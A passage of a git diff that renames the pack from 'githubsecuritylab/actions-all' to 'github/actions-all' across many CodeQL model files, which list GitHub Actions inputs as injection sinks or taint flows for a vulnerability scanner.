+++ b/ql/lib/ext/anchore_sbom-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["anchore/sbom-action", "*", "input.syft-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/anchore_scan-action.model.yml b/ql/lib/ext/anchore_scan-action.model.yml
index 721042aafaf..21ea405b32c 100644
--- a/ql/lib/ext/anchore_scan-action.model.yml
+++ b/ql/lib/ext/anchore_scan-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["anchore/scan-action", "*", "input.grype-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/andresz1_size-limit-action.model.yml b/ql/lib/ext/andresz1_size-limit-action.model.yml
index ee4dbaf2b55..1e95a8c0273 100644
--- a/ql/lib/ext/andresz1_size-limit-action.model.yml
+++ b/ql/lib/ext/andresz1_size-limit-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection", "manual"]
diff --git a/ql/lib/ext/android-actions_setup-android.model.yml b/ql/lib/ext/android-actions_setup-android.model.yml
index 76ae920d255..1ecba6ef1a1 100644
--- a/ql/lib/ext/android-actions_setup-android.model.yml
+++ b/ql/lib/ext/android-actions_setup-android.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint", "manual"]
diff --git a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml
index 46f667d75a0..5d7cb6e0b91 100644
--- a/ql/lib/ext/apple-actions_import-codesign-certs.model.yml
+++ b/ql/lib/ext/apple-actions_import-codesign-certs.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint", "manual"]
diff --git a/ql/lib/ext/asdf-vm_actions.model.yml b/ql/lib/ext/asdf-vm_actions.model.yml
index 4df6fe61a43..26b2e2eb693 100644
--- a/ql/lib/ext/asdf-vm_actions.model.yml
+++ b/ql/lib/ext/asdf-vm_actions.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["asdf-vm/actions", "*", "input.before_install", "command-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml
index aab329160ea..99324837e75 100644
--- a/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml
+++ b/ql/lib/ext/ashley-taylor_read-json-property-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint", "manual"]
diff --git a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml
index 610d188f065..cd827ffc2f8 100644
--- a/ql/lib/ext/ashley-taylor_regex-property-action.model.yml
+++ b/ql/lib/ext/ashley-taylor_regex-property-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint", "manual"]
diff --git a/ql/lib/ext/aszc_change-string-case-action.model.yml b/ql/lib/ext/aszc_change-string-case-action.model.yml
index b571bded8ca..64abc03a5fb 100644
--- a/ql/lib/ext/aszc_change-string-case-action.model.yml
+++ b/ql/lib/ext/aszc_change-string-case-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint", "manual"]
diff --git a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml
index cd8f4f73e49..63eb8b21249 100644
--- a/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml
+++ b/ql/lib/ext/aws-actions_configure-aws-credentials.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint", "manual"]
diff --git a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml
index 6ebc3875e07..170ceb2f95c 100644
--- a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml
+++ b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection", "manual"]
diff --git a/ql/lib/ext/azure_powershell.model.yml b/ql/lib/ext/azure_powershell.model.yml
index 2b2dbd014b7..e050b61815e 100644
--- a/ql/lib/ext/azure_powershell.model.yml
+++ b/ql/lib/ext/azure_powershell.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["azure/powershell", "*", "input.azPSVersion", "command-injection", "manual"]
diff --git a/ql/lib/ext/bahmutov_npm-install.model.yml b/ql/lib/ext/bahmutov_npm-install.model.yml
index 78b7eb1394c..7d646dece69 100644
--- a/ql/lib/ext/bahmutov_npm-install.model.yml
+++ b/ql/lib/ext/bahmutov_npm-install.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bahmutov/npm-install", "*", "input.install-command", "command-injection", "manual"]
diff --git a/ql/lib/ext/blackducksoftware_github-action.model.yml b/ql/lib/ext/blackducksoftware_github-action.model.yml
index 0f146da2e0c..fb03722c16a 100644
--- a/ql/lib/ext/blackducksoftware_github-action.model.yml
+++ b/ql/lib/ext/blackducksoftware_github-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["blackducksoftware/github-action", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/bobheadxi_deployments.model.yml b/ql/lib/ext/bobheadxi_deployments.model.yml
index 483a3bf5172..a14748aead0 100644
--- a/ql/lib/ext/bobheadxi_deployments.model.yml
+++ b/ql/lib/ext/bobheadxi_deployments.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint", "manual"]
diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml
index e06e75f7a3b..4caf23c8812 100644
--- a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml
+++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml
@@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection", "manual"]
diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml
index d0a88ff3167..1fa66b8ceb6 100644
--- a/ql/lib/ext/bufbuild_buf-lint-action.model.yml
+++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml
@@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection", "manual"]
diff --git a/ql/lib/ext/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/bufbuild_buf-setup-action.model.yml
index a29f84a55b5..f2fed75539b 100644
--- a/ql/lib/ext/bufbuild_buf-setup-action.model.yml
+++ b/ql/lib/ext/bufbuild_buf-setup-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection", "manual"]
diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml
index 0e11fe45b42..dfaffaf87de 100644
--- a/ql/lib/ext/cachix_cachix-action.model.yml
+++ b/ql/lib/ext/cachix_cachix-action.model.yml
@@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cachix/cachix-action", "*", "input.installCommand", "command-injection", "manual"]
diff --git a/ql/lib/ext/changesets_action.model.yml b/ql/lib/ext/changesets_action.model.yml
index 7e0970034a5..7bab09bca76 100644
--- a/ql/lib/ext/changesets_action.model.yml
+++ b/ql/lib/ext/changesets_action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["changesets/action", "*", "input.publish", "command-injection", "manual"]
diff --git a/ql/lib/ext/cloudflare_wrangler-action.model.yml b/ql/lib/ext/cloudflare_wrangler-action.model.yml
index 2f62f211da9..86759ad40d5 100644
--- a/ql/lib/ext/cloudflare_wrangler-action.model.yml
+++ b/ql/lib/ext/cloudflare_wrangler-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection", "manual"]
diff --git a/ql/lib/ext/coursier_cache-action.model.yml b/ql/lib/ext/coursier_cache-action.model.yml
index f94ad242321..65474ba343d 100644
--- a/ql/lib/ext/coursier_cache-action.model.yml
+++ b/ql/lib/ext/coursier_cache-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint", "manual"]
diff --git a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml
index 5872399881c..e3dd557084b 100644
--- a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml
+++ b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml
index 02c5dcd3cca..f3cb32b612f 100644
--- a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml
+++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/csexton_release-asset-action.model.yml b/ql/lib/ext/csexton_release-asset-action.model.yml
index 45bf0c57355..639ee965f42 100644
--- a/ql/lib/ext/csexton_release-asset-action.model.yml
+++ b/ql/lib/ext/csexton_release-asset-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint", "manual"]
diff --git a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml
index 4ac3492c41c..40d03569c8d 100644
--- a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml
+++ b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection", "manual"]
diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml
index a48da0cedfc..ed20a562375 100644
--- a/ql/lib/ext/cypress-io_github-action.model.yml
+++ b/ql/lib/ext/cypress-io_github-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["cypress-io/github-action", "*", "env.GH_BRANCH", "branch", "manual"]
diff --git a/ql/lib/ext/dailydotdev_action-devcard.model.yml b/ql/lib/ext/dailydotdev_action-devcard.model.yml
index 6ca7aa86c06..22725484ea4 100644
--- a/ql/lib/ext/dailydotdev_action-devcard.model.yml
+++ b/ql/lib/ext/dailydotdev_action-devcard.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection", "manual"]
diff --git a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml
index 11f1f10980f..d7839211e20 100644
--- a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml
+++ b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection", "manual"]
diff --git a/ql/lib/ext/daspn_private-actions-checkout.model.yml b/ql/lib/ext/daspn_private-actions-checkout.model.yml
index 9ed2cb7908b..3ff92757361 100644
--- a/ql/lib/ext/daspn_private-actions-checkout.model.yml
+++ b/ql/lib/ext/daspn_private-actions-checkout.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection", "manual"]
diff --git a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml
index 7f279f37a45..2e41b4f8eb5 100644
--- a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml
+++ b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection", "manual"]
diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml
index 68f434f4797..62ff29bc9f0 100644
--- a/ql/lib/ext/dawidd6_action-download-artifact.model.yml
+++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["dawidd6/action-download-artifact", "*", "output.artifacts", "artifact", "manual"]
diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml
index 890a47c79fc..af4e15da03b 100644
--- a/ql/lib/ext/delaguardo_setup-clojure.model.yml
+++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml
index aff5c330316..2dbf4718714 100644
--- a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml
+++ b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection", "manual"]
diff --git a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml
index 8f5e22fa2d9..4bc7e251808 100644
--- a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml
+++ b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection", "manual"]
diff --git a/ql/lib/ext/docker_build-push-action.model.yml b/ql/lib/ext/docker_build-push-action.model.yml
index ff0131da99e..845ae1770ed 100644
--- a/ql/lib/ext/docker_build-push-action.model.yml
+++ b/ql/lib/ext/docker_build-push-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["docker/build-push-action", "*", "input.context", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/endbug_latest-tag.model.yml b/ql/lib/ext/endbug_latest-tag.model.yml
index 1d82fb8f836..780acdb98ff 100644
--- a/ql/lib/ext/endbug_latest-tag.model.yml
+++ b/ql/lib/ext/endbug_latest-tag.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["endbug/latest-tag", "*", "input.ref", "command-injection", "manual"]
diff --git a/ql/lib/ext/expo_expo-github-action.model.yml b/ql/lib/ext/expo_expo-github-action.model.yml
index 1e4cc21dd13..038f1639d3c 100644
--- a/ql/lib/ext/expo_expo-github-action.model.yml
+++ b/ql/lib/ext/expo_expo-github-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["expo/expo-github-action", "*", "input.command", "command-injection", "manual"]
diff --git a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml
index ba729868a04..d948bda8bf4 100644
--- a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml
+++ b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection", "manual"]
diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml
index 504f0693977..ed9eeb6b252 100644
--- a/ql/lib/ext/frabert_replace-string-action.model.yml
+++ b/ql/lib/ext/frabert_replace-string-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint", "manual"]
diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
index 48267b6d082..f6441133c7a 100644
--- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
+++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "text", "manual"]
diff --git a/ql/lib/ext/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/gabrielbb_xvfb-action.model.yml
index 26eea1d2341..357ffc1c94a 100644
--- a/ql/lib/ext/gabrielbb_xvfb-action.model.yml
+++ b/ql/lib/ext/gabrielbb_xvfb-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection", "manual"]
diff --git a/ql/lib/ext/game-ci_unity-builder.model.yml b/ql/lib/ext/game-ci_unity-builder.model.yml
index 7993d827fa6..0288103fd0a 100644
--- a/ql/lib/ext/game-ci_unity-builder.model.yml
+++ b/ql/lib/ext/game-ci_unity-builder.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection", "manual"]
diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml
index de48ea5a709..05dca2f8262 100644
--- a/ql/lib/ext/game-ci_unity-test-runner.model.yml
+++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml
index 36a9b24f089..123dabe450e 100644
--- a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml
+++ b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml
index f04f8dda6c8..a098666dba0 100644
--- a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml
+++ b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["actions/actions-runner-controller", "*", "input.image-tag", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml
index a37d6452d50..476c522f5ea 100644
--- a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml
+++ b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["adap/flower", "*", "input.poetry-version", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml
index 352eb51996a..ad369575c42 100644
--- a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml
+++ b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["agoric/agoric-sdk", "*", "input.xsnap-random-init", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml
index 44f34c11cb3..e68306a454c 100644
--- a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml
+++ b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["airbnb/lottie-ios", "*", "input.xcode", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml
index 3fd2e46296a..923d267ac66 100644
--- a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml
+++ b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["airbytehq/airbyte", "*", "input.options", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml
index 881374b6c90..9557cbbee80 100644
--- a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml
+++ b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["amazon-ion/ion-java", "*", "input.project_version", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml
index 6d77c866dc2..eea604dc8dd 100644
--- a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml
+++ b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["anchore/grype", "*", "input.bootstrap-apt-packages", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml
index 0b27c584584..5ee8503193b 100644
--- a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml
+++ b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["anchore/syft", "*", "input.bootstrap-apt-packages", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml
index 911d3e57155..44795adc64a 100644
--- a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml
+++ b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["angular/dev-infra", "*", "input.firebase-public-dir", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml
index 1ac668cf55a..a1a7e28f572 100644
--- a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml
+++ b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ansible/ansible-lint", "*", "input.args", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml
index 5cf121dcef2..792a00ea387 100644
--- a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml
+++ b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ansible/awx", "*", "input.log-filename", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml
index d946204e9b9..5ee9c5aefbe 100644
--- a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml
+++ b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml
